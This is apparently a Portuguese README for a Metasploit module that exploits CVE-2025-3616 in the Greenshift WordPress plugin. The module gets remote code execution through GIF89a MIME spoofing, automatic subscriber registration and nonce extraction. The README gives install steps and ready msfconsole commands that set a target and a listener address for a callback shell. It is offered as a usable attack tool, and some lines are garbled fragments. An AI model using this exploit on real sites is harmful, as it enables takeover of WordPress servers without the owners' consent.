
Módulo Metasploit que explora upload arbitrário de arquivos no plugin Greenshift WordPress (CVE-2025-3616) para alcançar RCE via falsificação de MIME, com auto-registro e extração de nonce.
Este repositório contém um módulo Metasploit para explorar CVE-2025-3616, uma vulnerabilidade de upload arbitrário de arquivo no plugin WordPress Greenshift (versões 11.4 a 11.4.5).
O exploit permite que usuários autenticados (Assinante+) façam upload de arquivos arbitrários, levando à Execução Remota de Código (RCE). Ele contorna a validação de tipo de arquivo do plugin falsificando o tipo MIME usando bytes mágicos GIF (GIF89a;).
USERNAME/PASSWORD).REGISTER para registrar automaticamente um novo usuário e explorar a vulnerabilidade usando os novos cookies de sessão (útil se o registro estiver ativado no alvo).wp_rest necessário do painel administrativo.finfo_file().Certifique-se de ter o Metasploit Framework instalado.
Copie wp_greenshift_file_upload.rb para o diretório local de módulos:
mkdir -p ~/.msf4/modules/exploits/unix/webapp/
cp wp_greenshift_file_upload.rb ~/.msf4/modules/exploits/unix/webapp/
Inicie msfconsole e recarregue os módulos:
msfconsole
msf6 > reload_all
Se o registro de usuário estiver ativado no alvo, você não precisa de credenciais.
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER true
run
Se você já possui um usuário válido (Assinante ou superior):
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER false
set USERNAME <USER>
set PASSWORD <PASS>
run
| Opção | Obrigatório | Descrição |
|---|---|---|
| RHOSTS | sim | O endereço do alvo |
| LHOST | sim | O endereço de escuta (seu IP) |
| REGISTER | não | Defina como true para registrar uma nova conta automaticamente (Padrão: false) |
| USERNAME | não | Nome de usuário do WordPress (obrigatório se REGISTER for false) |
| PASSWORD | não | Senha do WordPress (obrigatório se REGISTER for false) |
| não | Email para registro (opcional, gerado automaticamente se vazio) |
Este módulo é apenas para fins educacionais e testes de penetração autorizados. O uso deste código para atacar alvos sem consentimento mútuo prévio é ilegal.